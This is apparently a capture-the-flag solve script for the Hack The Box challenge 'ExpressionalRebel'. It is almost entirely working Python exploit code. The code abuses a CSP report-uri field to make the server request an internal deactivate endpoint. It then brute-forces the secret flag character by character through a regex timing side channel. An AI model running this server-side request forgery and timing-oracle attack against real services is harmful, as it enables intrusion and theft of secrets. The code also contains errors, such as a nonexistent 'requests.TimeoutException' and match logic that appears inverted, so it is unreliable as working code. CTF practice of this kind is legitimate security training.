ExpressionalRebel

import requests, re, urllib.parse

eval_endpoint = "http://<YOUR_INDSTANCE_AND_PORT>/api/evaluate"
deactivate_endpoint = "http://127.1:1337/deactivate"

def brute_force_flag():
    alphabet = map(re.escape, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789[]{}/\!@#$%^&*()_+=-<>?")

    # The end here is just a hard-to-compute regex. If the request takes lnger than ~100ms, this means that the right
    # hand side of this regex is being evaluated, and that means that the left side didn't match. 
    regex = ".+|(?:[^<]+|<(?:[^\/]|\/(?:[^s])))*>(?:[^<]+|<(?:[^/]|\/(?:[^s]))*)"

    current_guess = "HTB{"
    while current_guess[::-1][0] != "}":
        for char in alphabet:
            # Concat the current best guess, with the chracter to test, and add the rest of the regex
            guess = current_guess + char + regex

            # Gotta make the secretCode URL safe
            u = deactivate_endpoint + "?secretCode=" + urllib.parse.quote(guess)
            data = {
                "csp": "report-uri " + u + ";"
            }
            try:
                res = requests.post(eval_endpoint, timeout=0.5, data=data)
            except requests.TimeoutException as e:
                # If the request timed out, we missed, so skip to next
                continue

            current_guess = current_guess + char
            print(current_guess)

    print("final guess was " + current_guess)
if __name__ == "__main__":
    brute_force_flag()
Mohammed Amer